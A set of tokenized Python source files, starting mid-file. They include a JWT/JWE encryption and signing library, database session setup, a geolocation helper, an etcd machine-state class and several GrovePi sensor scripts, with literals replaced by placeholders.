( self , value , dialect ) : <EOL> return json . loads ( value ) <EOL> cfg_file = SafeConfigParser ( ) <EOL> path_to_cfg = os . path . dirname ( __file__ ) <EOL> path_to_cfg = os . path . join ( path_to_cfg , "<STR_LIT>" ) <EOL> cfg_file . read ( path_to_cfg ) <EOL> engine = create_engine ( build_db_conn_string ( cfg_file ) ) <EOL> Base = declarative_base ( ) <EOL> Session = sessionmaker ( bind = engine ) <EOL> db = Session ( ) </s>
<s> import logging <EOL> logger = logging . getLogger ( __name__ ) <EOL> try : <EOL> from cjson import encode as _json_encode , decode as json_decode <EOL> except ImportError : <EOL> logger . warn ( '<STR_LIT>' ) <EOL> from json import loads as json_decode , dumps as _json_encode <EOL> import zlib <EOL> import datetime <EOL> from base64 import urlsafe_b64encode , urlsafe_b64decode <EOL> from collections import OrderedDict , namedtuple <EOL> from copy import deepcopy <EOL> from time import time <EOL> from struct import pack <EOL> from Crypto . Hash import HMAC , SHA256 , SHA384 , SHA512 <EOL> from Crypto . Cipher import PKCS1_OAEP , AES <EOL> from Crypto . PublicKey import RSA <EOL> from Crypto . Random import get_random_bytes <EOL> from Crypto . Signature import PKCS1_v1_5 as PKCS1_v1_5_SIG <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> JWE = namedtuple ( '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> JWS = namedtuple ( '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> JWT = namedtuple ( '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> CLAIM_ISSUER = '<STR_LIT>' <EOL> CLAIM_SUBJECT = '<STR_LIT>' <EOL> CLAIM_AUDIENCE = '<STR_LIT>' <EOL> CLAIM_EXPIRATION_TIME = '<STR_LIT>' <EOL> CLAIM_NOT_BEFORE = '<STR_LIT>' <EOL> CLAIM_ISSUED_AT = '<STR_LIT>' <EOL> CLAIM_JWT_ID = '<STR_LIT>' <EOL> HEADER_ALG = '<STR_LIT>' <EOL> HEADER_ENC = '<STR_LIT>' <EOL> HEADER_ZIP = '<STR_LIT>' <EOL> HEADER_CRIT = '<STR_LIT>' <EOL> _TEMP_VER_KEY = '<STR_LIT>' <EOL> _TEMP_VER = <NUM_LIT:2> <EOL> JWE_REQUIRED_HEADERS = set ( ( HEADER_ALG , HEADER_ENC ) ) <EOL> JWE_UNDERSTOOD_HEADERS = set ( ( HEADER_ALG , HEADER_ENC , HEADER_ZIP , HEADER_CRIT ) ) <EOL> class Error ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class Expired ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class NotYetValid ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def 
serialize_compact ( jwt ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT:.>' . join ( jwt ) <EOL> def deserialize_compact ( jwt ) : <EOL> """<STR_LIT>""" <EOL> parts = jwt . split ( '<STR_LIT:.>' ) <EOL> if len ( parts ) == <NUM_LIT:3> : <EOL> token_type = JWS <EOL> elif len ( parts ) == <NUM_LIT:5> : <EOL> token_type = JWE <EOL> else : <EOL> raise Error ( '<STR_LIT>' ) <EOL> return token_type ( * parts ) <EOL> def json_encode ( data ) : <EOL> return _json_encode ( <EOL> OrderedDict ( sorted ( data . items ( ) , key = lambda item : item [ <NUM_LIT:0> ] ) ) <EOL> ) <EOL> def _generate_encryption_keys ( alg , rng ) : <EOL> ( _ , key_len ) , _ = JWA [ alg ] <EOL> num_bytes = key_len / <NUM_LIT:8> <EOL> mac_key = rng ( num_bytes ) <EOL> enc_key = rng ( num_bytes ) <EOL> return mac_key , enc_key <EOL> def _parse_encryption_keys ( key , alg ) : <EOL> ( _ , key_len ) , _ = JWA [ alg ] <EOL> num_bytes = key_len / <NUM_LIT:8> <EOL> mac_key = key [ : num_bytes ] <EOL> enc_key = key [ num_bytes : ] <EOL> return mac_key , enc_key <EOL> def _encrypt_key ( cek , jwk , alg ) : <EOL> ( cipher , _ ) , _ = JWA [ alg ] <EOL> return cipher ( cek , jwk ) <EOL> def _decrypt_key ( encrypted_key , jwk , alg ) : <EOL> ( _ , decipher ) , _ = JWA [ alg ] <EOL> return decipher ( encrypted_key , jwk ) <EOL> def _generate_iv ( enc , rng ) : <EOL> return rng ( AES . 
block_size ) <EOL> def _generate_authentication_tag ( key , protected_header , ciphertext , iv , alg ) : <EOL> aad = b64encode_url ( protected_header ) <EOL> _ , ( ( cipher , _ ) , mod ) = JWA [ alg ] <EOL> al = pack ( "<STR_LIT>" , <NUM_LIT:8> * len ( aad ) ) <EOL> chunks = ( aad , iv , ciphertext , al ) <EOL> return cipher ( chunks , key , mod ) [ : len ( key ) ] <EOL> def _verify_header ( header ) : <EOL> for key in JWE_REQUIRED_HEADERS : <EOL> if key not in header : <EOL> return False <EOL> if HEADER_CRIT in header : <EOL> for crit in header [ HEADER_CRIT ] : <EOL> if crit not in JWE_UNDERSTOOD_HEADERS : <EOL> return False <EOL> return True <EOL> def encrypt ( claims , jwk , adata = '<STR_LIT>' , add_header = None , alg = '<STR_LIT>' , <EOL> enc = '<STR_LIT>' , rng = get_random_bytes , compression = None ) : <EOL> """<STR_LIT>""" <EOL> claims = deepcopy ( claims ) <EOL> assert _TEMP_VER_KEY not in claims <EOL> claims [ _TEMP_VER_KEY ] = _TEMP_VER <EOL> header = dict ( ( add_header or { } ) . items ( ) + [ <EOL> ( HEADER_ENC , enc ) , ( HEADER_ALG , alg ) ] ) <EOL> assert _TEMP_VER_KEY not in header <EOL> header [ _TEMP_VER_KEY ] = claims [ _TEMP_VER_KEY ] <EOL> plaintext = json_encode ( claims ) <EOL> if compression is not None : <EOL> header [ HEADER_ZIP ] = compression <EOL> try : <EOL> ( compress , _ ) = COMPRESSION [ compression ] <EOL> except KeyError : <EOL> raise Error ( <EOL> '<STR_LIT>' . format ( compression ) ) <EOL> plaintext = compress ( plaintext ) <EOL> ( ( cipher , _ ) , key_size ) , ( ( hash_fn , _ ) , hash_mod ) = JWA [ enc ] <EOL> iv = rng ( AES . block_size ) <EOL> encryption_key = rng ( hash_mod . digest_size ) <EOL> ciphertext = cipher ( plaintext , encryption_key [ - hash_mod . digest_size / <NUM_LIT:2> : ] , iv ) <EOL> hash = hash_fn ( _jwe_hash_str ( ciphertext , iv , adata ) , <EOL> encryption_key [ : - hash_mod . 
digest_size / <NUM_LIT:2> ] , hash_mod ) <EOL> ( cipher , _ ) , _ = JWA [ alg ] <EOL> encryption_key_ciphertext = cipher ( encryption_key , jwk ) <EOL> return JWE ( * map ( b64encode_url , <EOL> ( json_encode ( header ) , <EOL> encryption_key_ciphertext , <EOL> iv , <EOL> ciphertext , <EOL> auth_tag ( hash ) ) ) ) <EOL> def spec_compliant_encrypt ( claims , jwk , add_header = None , alg = '<STR_LIT>' , <EOL> enc = '<STR_LIT>' , rng = get_random_bytes ) : <EOL> """<STR_LIT>""" <EOL> header = dict ( ( add_header or { } ) . items ( ) + [ ( HEADER_ENC , enc ) , <EOL> ( HEADER_ALG , alg ) ] ) <EOL> protected_header = json_encode ( header ) <EOL> mac_key , enc_key = _generate_encryption_keys ( enc , rng ) <EOL> encrypted_key = _encrypt_key ( mac_key + enc_key , jwk , alg ) <EOL> iv = _generate_iv ( enc , rng ) <EOL> plaintext = json_encode ( claims ) <EOL> if HEADER_ZIP in header : <EOL> try : <EOL> ( compression_func , _ ) = COMPRESSION [ header [ HEADER_ZIP ] ] <EOL> except KeyError : <EOL> raise Error ( <EOL> '<STR_LIT>' . 
format ( header [ HEADER_ZIP ] ) ) <EOL> M = compression_func ( plaintext ) <EOL> else : <EOL> M = plaintext <EOL> ( ( cipher , _ ) , key_len ) , _ = JWA [ enc ] <EOL> ciphertext = cipher ( M , enc_key , iv ) <EOL> authentication_tag = _generate_authentication_tag ( <EOL> mac_key , protected_header , ciphertext , iv , enc <EOL> ) <EOL> return JWE ( <EOL> * map ( <EOL> b64encode_url , <EOL> ( protected_header , encrypted_key , iv , ciphertext , <EOL> authentication_tag ) <EOL> ) <EOL> ) <EOL> def legacy_decrypt ( jwe , jwk , adata = '<STR_LIT>' , validate_claims = True , <EOL> expiry_seconds = None ) : <EOL> """<STR_LIT>""" <EOL> protected_header , encrypted_key , iv , ciphertext , authentication_tag = map ( <EOL> b64decode_url , jwe ) <EOL> header = json_decode ( protected_header ) <EOL> alg = header [ HEADER_ALG ] <EOL> enc = header [ HEADER_ENC ] <EOL> encryption_key = _decrypt_key ( encrypted_key , jwk , alg ) <EOL> ( ( _ , decipher ) , _ ) , ( ( hash_fn , _ ) , mod ) = JWA [ enc ] <EOL> version = header . get ( _TEMP_VER_KEY ) <EOL> if version : <EOL> plaintext = decipher ( ciphertext , encryption_key [ - mod . digest_size / <NUM_LIT:2> : ] , <EOL> iv ) <EOL> hash = hash_fn ( _jwe_hash_str ( ciphertext , iv , adata , version ) , <EOL> encryption_key [ : - mod . digest_size / <NUM_LIT:2> ] , mod = mod ) <EOL> else : <EOL> plaintext = decipher ( ciphertext , encryption_key [ : - mod . digest_size ] , iv ) <EOL> hash = hash_fn ( _jwe_hash_str ( ciphertext , iv , adata , version ) , <EOL> encryption_key [ - mod . digest_size : ] , mod = mod ) <EOL> if not const_compare ( auth_tag ( hash ) , authentication_tag ) : <EOL> raise Error ( '<STR_LIT>' ) <EOL> if HEADER_ZIP in header : <EOL> try : <EOL> ( _ , decompress ) = COMPRESSION [ header [ HEADER_ZIP ] ] <EOL> except KeyError : <EOL> raise Error ( '<STR_LIT>' . 
format ( <EOL> header [ HEADER_ZIP ] ) ) <EOL> plaintext = decompress ( plaintext ) <EOL> claims = json_decode ( plaintext ) <EOL> try : <EOL> del claims [ _TEMP_VER_KEY ] <EOL> except KeyError : <EOL> pass <EOL> _validate ( claims , validate_claims , expiry_seconds ) <EOL> return JWT ( header , claims ) <EOL> def spec_compliant_decrypt ( jwe , jwk , validate_claims = True , <EOL> expiry_seconds = None ) : <EOL> """<STR_LIT>""" <EOL> protected_header , encrypted_key , iv , ciphertext , authentication_tag = map ( <EOL> b64decode_url , jwe <EOL> ) <EOL> header = json_decode ( protected_header ) <EOL> if not _verify_header ( header ) : <EOL> raise Error ( '<STR_LIT>' ) <EOL> alg = header [ HEADER_ALG ] <EOL> enc = header [ HEADER_ENC ] <EOL> encryption_key = _decrypt_key ( encrypted_key , jwk , alg ) <EOL> mac_key , enc_key = _parse_encryption_keys ( encryption_key , enc ) <EOL> expected_tag = _generate_authentication_tag ( <EOL> mac_key , json_encode ( header ) , ciphertext , iv , enc <EOL> ) <EOL> if not const_compare ( expected_tag , authentication_tag ) : <EOL> raise Error ( '<STR_LIT>' ) <EOL> ( ( _ , decipher ) , _ ) , _ = JWA [ enc ] <EOL> M = decipher ( ciphertext , enc_key , iv ) <EOL> if HEADER_ZIP in header : <EOL> try : <EOL> ( _ , decompress ) = COMPRESSION [ header [ HEADER_ZIP ] ] <EOL> except KeyError : <EOL> raise Error ( '<STR_LIT>' . 
format ( <EOL> header [ HEADER_ZIP ] ) ) <EOL> plaintext = decompress ( M ) <EOL> else : <EOL> plaintext = M <EOL> claims = json_decode ( plaintext ) <EOL> _validate ( claims , validate_claims , expiry_seconds ) <EOL> return JWT ( header , claims ) <EOL> def decrypt ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return legacy_decrypt ( * args , ** kwargs ) <EOL> except ( Error , ValueError ) as e : <EOL> return spec_compliant_decrypt ( * args , ** kwargs ) <EOL> def sign ( claims , jwk , add_header = None , alg = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> ( hash_fn , _ ) , mod = JWA [ alg ] <EOL> header = dict ( ( add_header or { } ) . items ( ) + [ ( HEADER_ALG , alg ) ] ) <EOL> header , payload = map ( b64encode_url , map ( json_encode , ( header , claims ) ) ) <EOL> sig = b64encode_url ( hash_fn ( _jws_hash_str ( header , payload ) , jwk [ '<STR_LIT:k>' ] , <EOL> mod = mod ) ) <EOL> return JWS ( header , payload , sig ) <EOL> def verify ( jws , jwk , alg , validate_claims = True , expiry_seconds = None ) : <EOL> """<STR_LIT>""" <EOL> header , payload , sig = map ( b64decode_url , jws ) <EOL> header = json_decode ( header ) <EOL> if alg != header [ HEADER_ALG ] : <EOL> raise Error ( '<STR_LIT>' ) <EOL> ( _ , verify_fn ) , mod = JWA [ header [ HEADER_ALG ] ] <EOL> if not verify_fn ( _jws_hash_str ( jws . header , jws . payload ) , <EOL> jwk [ '<STR_LIT:k>' ] , sig , mod = mod ) : <EOL> raise Error ( '<STR_LIT>' ) <EOL> claims = json_decode ( b64decode_url ( jws . 
payload ) ) <EOL> _validate ( claims , validate_claims , expiry_seconds ) <EOL> return JWT ( header , claims ) <EOL> def b64decode_url ( istr ) : <EOL> """<STR_LIT>""" <EOL> istr = encode_safe ( istr ) <EOL> try : <EOL> return urlsafe_b64decode ( istr + '<STR_LIT:=>' * ( <NUM_LIT:4> - ( len ( istr ) % <NUM_LIT:4> ) ) ) <EOL> except TypeError as e : <EOL> raise Error ( '<STR_LIT>' % ( e ) ) <EOL> def b64encode_url ( istr ) : <EOL> """<STR_LIT>""" <EOL> return urlsafe_b64encode ( encode_safe ( istr ) ) . rstrip ( '<STR_LIT:=>' ) <EOL> def encode_safe ( istr , encoding = '<STR_LIT:utf8>' ) : <EOL> try : <EOL> return istr . encode ( encoding ) <EOL> except UnicodeDecodeError : <EOL> pass <EOL> return istr <EOL> def auth_tag ( hmac ) : <EOL> return hmac [ : len ( hmac ) // <NUM_LIT:2> ] <EOL> def pad_pkcs7 ( s ) : <EOL> sz = AES . block_size - ( len ( s ) % AES . block_size ) <EOL> return s + ( chr ( sz ) * sz ) <EOL> def unpad_pkcs7 ( s ) : <EOL> return s [ : - ord ( s [ - <NUM_LIT:1> ] ) ] <EOL> def encrypt_oaep ( plaintext , jwk ) : <EOL> return PKCS1_OAEP . new ( RSA . importKey ( jwk [ '<STR_LIT:k>' ] ) ) . encrypt ( plaintext ) <EOL> def decrypt_oaep ( ciphertext , jwk ) : <EOL> try : <EOL> return PKCS1_OAEP . new ( RSA . importKey ( jwk [ '<STR_LIT:k>' ] ) ) . decrypt ( ciphertext ) <EOL> except ValueError as e : <EOL> raise Error ( e . args [ <NUM_LIT:0> ] ) <EOL> def hmac_sign ( s , key , mod = SHA256 ) : <EOL> hmac = HMAC . new ( key , digestmod = mod ) <EOL> if not isinstance ( s , ( tuple , list ) ) : <EOL> s = ( s , ) <EOL> for item in s : <EOL> hmac . update ( item ) <EOL> return hmac . digest ( ) <EOL> def hmac_verify ( s , key , sig , mod = SHA256 ) : <EOL> hmac = HMAC . new ( key , digestmod = mod ) <EOL> if not isinstance ( s , ( tuple , list ) ) : <EOL> s = ( s , ) <EOL> for item in s : <EOL> hmac . update ( item ) <EOL> if not const_compare ( hmac . 
digest ( ) , sig ) : <EOL> return False <EOL> return True <EOL> def rsa_sign ( s , key , mod = SHA256 ) : <EOL> key = RSA . importKey ( key ) <EOL> hash = mod . new ( s ) <EOL> return PKCS1_v1_5_SIG . new ( key ) . sign ( hash ) <EOL> def rsa_verify ( s , key , sig , mod = SHA256 ) : <EOL> key = RSA . importKey ( key ) <EOL> hash = mod . new ( s ) <EOL> return PKCS1_v1_5_SIG . new ( key ) . verify ( hash , sig ) <EOL> def encrypt_aescbc ( plaintext , key , iv ) : <EOL> plaintext = pad_pkcs7 ( plaintext ) <EOL> return AES . new ( key , AES . MODE_CBC , iv ) . encrypt ( plaintext ) <EOL> def decrypt_aescbc ( ciphertext , key , iv ) : <EOL> return unpad_pkcs7 ( AES . new ( key , AES . MODE_CBC , iv ) . decrypt ( ciphertext ) ) <EOL> def const_compare ( stra , strb ) : <EOL> if len ( stra ) != len ( strb ) : <EOL> return False <EOL> res = <NUM_LIT:0> <EOL> for a , b in zip ( stra , strb ) : <EOL> res |= ord ( a ) ^ ord ( b ) <EOL> return res == <NUM_LIT:0> <EOL> class _JWA ( object ) : <EOL> """<STR_LIT>""" <EOL> _impl = { <EOL> '<STR_LIT>' : ( ( hmac_sign , hmac_verify ) , SHA256 ) , <EOL> '<STR_LIT>' : ( ( hmac_sign , hmac_verify ) , SHA384 ) , <EOL> '<STR_LIT>' : ( ( hmac_sign , hmac_verify ) , SHA512 ) , <EOL> '<STR_LIT>' : ( ( rsa_sign , rsa_verify ) , SHA256 ) , <EOL> '<STR_LIT>' : ( ( rsa_sign , rsa_verify ) , SHA384 ) , <EOL> '<STR_LIT>' : ( ( rsa_sign , rsa_verify ) , SHA512 ) , <EOL> '<STR_LIT>' : ( ( encrypt_oaep , decrypt_oaep ) , <NUM_LIT> ) , <EOL> '<STR_LIT>' : ( ( encrypt_aescbc , decrypt_aescbc ) , <NUM_LIT> ) , <EOL> '<STR_LIT>' : ( ( encrypt_aescbc , decrypt_aescbc ) , <NUM_LIT> ) , <EOL> '<STR_LIT>' : ( ( encrypt_aescbc , decrypt_aescbc ) , <NUM_LIT> ) , <EOL> } <EOL> def __getitem__ ( self , key ) : <EOL> """<STR_LIT>""" <EOL> if key in self . _impl : <EOL> return self . _impl [ key ] <EOL> enc , hash = self . _compound_from_key ( key ) <EOL> return self . _impl [ enc ] , self . 
_impl [ hash ] <EOL> def _compound_from_key ( self , key ) : <EOL> try : <EOL> enc , hash = key . split ( '<STR_LIT:+>' ) <EOL> return enc , hash <EOL> except ValueError : <EOL> pass <EOL> try : <EOL> enc , hash = key . split ( '<STR_LIT:->' ) <EOL> return enc , hash <EOL> except ValueError : <EOL> pass <EOL> raise Error ( '<STR_LIT>' . format ( key ) ) <EOL> JWA = _JWA ( ) <EOL> COMPRESSION = { <EOL> '<STR_LIT>' : ( zlib . compress , zlib . decompress ) , <EOL> } <EOL> def _format_timestamp ( ts ) : <EOL> dt = datetime . datetime . utcfromtimestamp ( ts ) <EOL> return dt . isoformat ( ) + '<STR_LIT>' <EOL> def _check_expiration_time ( now , expiration_time ) : <EOL> if now >= expiration_time : <EOL> raise Expired ( '<STR_LIT>' . format ( <EOL> _format_timestamp ( expiration_time ) ) <EOL> ) <EOL> def _check_not_before ( now , not_before ) : <EOL> if not_before > now : <EOL> raise NotYetValid ( '<STR_LIT>' . format ( <EOL> _format_timestamp ( not_before ) ) <EOL> ) <EOL> def _validate ( claims , validate_claims , expiry_seconds ) : <EOL> """<STR_LIT>""" <EOL> if not validate_claims : <EOL> return <EOL> now = time ( ) <EOL> try : <EOL> expiration_time = claims [ CLAIM_EXPIRATION_TIME ] <EOL> except KeyError : <EOL> pass <EOL> else : <EOL> _check_expiration_time ( now , expiration_time ) <EOL> try : <EOL> issued_at = claims [ CLAIM_ISSUED_AT ] <EOL> except KeyError : <EOL> pass <EOL> else : <EOL> if expiry_seconds is not None : <EOL> _check_expiration_time ( now , issued_at + expiry_seconds ) <EOL> try : <EOL> not_before = claims [ CLAIM_NOT_BEFORE ] <EOL> except KeyError : <EOL> pass <EOL> else : <EOL> _check_not_before ( now , not_before ) <EOL> def _jwe_hash_str ( ciphertext , iv , adata = '<STR_LIT>' , version = _TEMP_VER ) : <EOL> if not version : <EOL> return '<STR_LIT:.>' . join ( ( adata , iv , ciphertext , str ( len ( adata ) ) ) ) <EOL> elif version == <NUM_LIT:1> : <EOL> return '<STR_LIT:.>' . 
join ( ( adata , iv , ciphertext , pack ( "<STR_LIT>" , len ( adata ) * <NUM_LIT:8> ) ) ) <EOL> return '<STR_LIT>' . join ( ( adata , iv , ciphertext , pack ( "<STR_LIT>" , len ( adata ) * <NUM_LIT:8> ) ) ) <EOL> def _jws_hash_str ( header , claims ) : <EOL> return '<STR_LIT:.>' . join ( ( header , claims ) ) <EOL> def cli_decrypt ( jwt , key ) : <EOL> print decrypt ( deserialize_compact ( jwt ) , { '<STR_LIT:k>' : key } , <EOL> validate_claims = False ) <EOL> def _cli ( ) : <EOL> import inspect <EOL> import sys <EOL> from argparse import ArgumentParser <EOL> from copy import copy <EOL> parser = ArgumentParser ( ) <EOL> subparsers = parser . add_subparsers ( dest = '<STR_LIT>' ) <EOL> commands = { <EOL> '<STR_LIT>' : cli_decrypt , <EOL> } <EOL> for k , fn in commands . items ( ) : <EOL> p = subparsers . add_parser ( k ) <EOL> for arg in inspect . getargspec ( fn ) . args : <EOL> p . add_argument ( arg ) <EOL> args = parser . parse_args ( ) <EOL> handler = commands [ args . subparser_name ] <EOL> handler_args = [ getattr ( args , k ) for k in inspect . getargspec ( <EOL> handler ) . args ] <EOL> handler ( * handler_args ) </s>
<s> import re <EOL> import geocoder <EOL> from six import string_types <EOL> class Location ( object ) : <EOL> """<STR_LIT>""" <EOL> lat = None <EOL> lng = None <EOL> def __init__ ( self , location , ** kwargs ) : <EOL> self . location = location <EOL> self . kwargs = kwargs <EOL> self . _check_input ( location ) <EOL> @ property <EOL> def ok ( self ) : <EOL> return bool ( self . latlng ) <EOL> def _convert_float ( self , number ) : <EOL> try : <EOL> return float ( number ) <EOL> except ValueError : <EOL> return None <EOL> def _check_input ( self , location ) : <EOL> if isinstance ( location , string_types ) : <EOL> expression = r"<STR_LIT>" <EOL> pattern = re . compile ( expression ) <EOL> match = pattern . findall ( location ) <EOL> if len ( match ) == <NUM_LIT:2> : <EOL> lat , lng = match <EOL> self . _check_for_list ( [ lat , lng ] ) <EOL> else : <EOL> provider = self . kwargs . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> g = geocoder . get ( location , provider = provider ) <EOL> if g . ok : <EOL> self . lat , self . lng = g . lat , g . lng <EOL> elif isinstance ( location , ( list , tuple ) ) : <EOL> self . _check_for_list ( location ) <EOL> elif isinstance ( location , dict ) : <EOL> self . _check_for_dict ( location ) <EOL> elif hasattr ( location , '<STR_LIT>' ) : <EOL> if location . latlng : <EOL> self . lat , self . lng = location . latlng <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % location ) <EOL> def _check_for_list ( self , location ) : <EOL> if len ( location ) == <NUM_LIT:2> : <EOL> lat = self . _convert_float ( location [ <NUM_LIT:0> ] ) <EOL> lng = self . _convert_float ( location [ <NUM_LIT:1> ] ) <EOL> condition_1 = isinstance ( lat , float ) <EOL> condition_2 = isinstance ( lng , float ) <EOL> if condition_1 and condition_2 : <EOL> condition_3 = - <NUM_LIT> <= lat <= <NUM_LIT> <EOL> condition_4 = - <NUM_LIT> <= lng <= <NUM_LIT> <EOL> if condition_3 and condition_4 : <EOL> self . lat = lat <EOL> self . lng = lng <EOL> return self . 
lat , self . lng <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def _check_for_dict ( self , location ) : <EOL> if '<STR_LIT>' in location and '<STR_LIT>' in location : <EOL> lat = location [ '<STR_LIT>' ] <EOL> lng = location [ '<STR_LIT>' ] <EOL> self . _check_for_list ( [ lat , lng ] ) <EOL> if '<STR_LIT:y>' in location and '<STR_LIT:x>' in location : <EOL> lat = location [ '<STR_LIT:y>' ] <EOL> lng = location [ '<STR_LIT:x>' ] <EOL> self . _check_for_list ( [ lat , lng ] ) <EOL> @ property <EOL> def latlng ( self ) : <EOL> if isinstance ( self . lat , float ) and isinstance ( self . lng , float ) : <EOL> return [ self . lat , self . lng ] <EOL> return [ ] <EOL> @ property <EOL> def latitude ( self ) : <EOL> return self . lat <EOL> @ property <EOL> def longitude ( self ) : <EOL> return self . lng <EOL> @ property <EOL> def xy ( self ) : <EOL> if isinstance ( self . lat , float ) and isinstance ( self . lng , float ) : <EOL> return [ self . lng , self . lat ] <EOL> return [ ] <EOL> def __str__ ( self ) : <EOL> if self . ok : <EOL> return '<STR_LIT>' . format ( self . lat , self . lng ) <EOL> return '<STR_LIT>' <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> l = Location ( [ <NUM_LIT:0.0> , <NUM_LIT:0.0> ] ) <EOL> print ( l . lng ) </s>
<s> from flask . ext . script import Manager <EOL> from app import app <EOL> manager = Manager ( app ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> manager . run ( ) </s>
<s> import json <EOL> import socket <EOL> from etcdstate import EtcdState <EOL> from etcdpaths import getMachineStatePath <EOL> STATUS_RUNNING = '<STR_LIT>' <EOL> class MachineState ( EtcdState ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , project_name , machine_id , etcd_client ) : <EOL> path = getMachineStatePath ( project_name , machine_id ) <EOL> super ( MachineState , self ) . __init__ ( path , etcd_client ) <EOL> def registerMachine ( self , component_names , ttl = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> machine_state = { <EOL> '<STR_LIT:status>' : STATUS_RUNNING , <EOL> '<STR_LIT>' : component_names , <EOL> '<STR_LIT>' : socket . gethostbyname ( socket . gethostname ( ) ) <EOL> } <EOL> self . setState ( machine_state , ttl = ttl ) <EOL> def getStatus ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . getState ( { '<STR_LIT:status>' : '<STR_LIT>' } ) <EOL> def removeMachine ( self ) : <EOL> """<STR_LIT>""" <EOL> self . deleteState ( ) </s>
<s> '''<STR_LIT>''' <EOL> from grovepi import * <EOL> from grove_oled import * <EOL> dht_sensor_port = <NUM_LIT:7> <EOL> oled_init ( ) <EOL> oled_clearDisplay ( ) <EOL> oled_setNormalDisplay ( ) <EOL> oled_setVerticalMode ( ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> while True : <EOL> try : <EOL> [ temp , hum ] = dht ( dht_sensor_port , <NUM_LIT:1> ) <EOL> print ( "<STR_LIT>" , temp , "<STR_LIT>" , hum , "<STR_LIT:%>" ) <EOL> t = str ( temp ) <EOL> h = str ( hum ) <EOL> oled_setTextXY ( <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> oled_putString ( "<STR_LIT>" ) <EOL> oled_setTextXY ( <NUM_LIT:2> , <NUM_LIT:0> ) <EOL> oled_putString ( "<STR_LIT>" ) <EOL> oled_putString ( t + '<STR_LIT:C>' ) <EOL> oled_setTextXY ( <NUM_LIT:3> , <NUM_LIT:0> ) <EOL> oled_putString ( "<STR_LIT>" ) <EOL> oled_putString ( h + "<STR_LIT:%>" ) <EOL> except ( IOError , TypeError ) as e : <EOL> print ( "<STR_LIT>" ) </s>
<s> '''<STR_LIT>''' <EOL> import grove_barometer_lib <EOL> b = grove_barometer_lib . barometer ( ) <EOL> while True ( ) : <EOL> print ( "<STR_LIT>" , b . temperature , "<STR_LIT>" , b . pressure , "<STR_LIT>" , b . altitude ) <EOL> b . update ( ) <EOL> time . sleep ( <NUM_LIT> ) </s>
<s> '''<STR_LIT>''' <EOL> import grove_gesture_sensor <EOL> import time <EOL> g = grove_gesture_sensor . gesture ( ) <EOL> g . init ( ) <EOL> while True : <EOL> gest = g . return_gesture ( ) <EOL> if gest == g . FORWARD : <EOL> print ( "<STR_LIT>" ) <EOL> elif gest == g . BACKWARD : <EOL> print ( "<STR_LIT>" ) <EOL> elif gest == g . RIGHT : <EOL> print ( "<STR_LIT>" ) <EOL> elif gest == g . LEFT : <EOL> print ( "<STR_LIT>" ) <EOL> elif gest == g . UP : <EOL> print ( "<STR_LIT>" ) <EOL> elif gest == g . DOWN : <EOL> print ( "<STR_LIT>" ) <EOL> elif gest == g . CLOCKWISE : <EOL> print ( "<STR_LIT>" ) <EOL> elif gest == g . ANTI_CLOCKWISE : <EOL> print ( "<STR_LIT>" ) <EOL> elif gest == g . WAVE : <EOL> print ( "<STR_LIT>" ) <EOL> elif gest == <NUM_LIT:0> : <EOL> print ( "<STR_LIT:->" ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT> ) </s>
<s> '''<STR_LIT>''' <EOL> import time <EOL> import grovepi <EOL> sensor = <NUM_LIT:4> <EOL> grovepi . pinMode ( sensor , "<STR_LIT>" ) <EOL> while True : <EOL> try : <EOL> if grovepi . digitalRead ( sensor ) == <NUM_LIT:0> : <EOL> print ( "<STR_LIT>" ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> except IOError : <EOL> print ( "<STR_LIT>" ) </s>
<s> '''<STR_LIT>''' <EOL> import time <EOL> import grovepi <EOL> relay = <NUM_LIT:4> <EOL> grovepi . pinMode ( relay , "<STR_LIT>" ) <EOL> while True : <EOL> try : <EOL> grovepi . digitalWrite ( relay , <NUM_LIT:1> ) <EOL> print ( "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> grovepi . digitalWrite ( relay , <NUM_LIT:0> ) <EOL> print ( "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> except KeyboardInterrupt : <EOL> grovepi . digitalWrite ( relay , <NUM_LIT:0> ) <EOL> break <EOL> except IOError : <EOL> print ( "<STR_LIT>" ) </s>
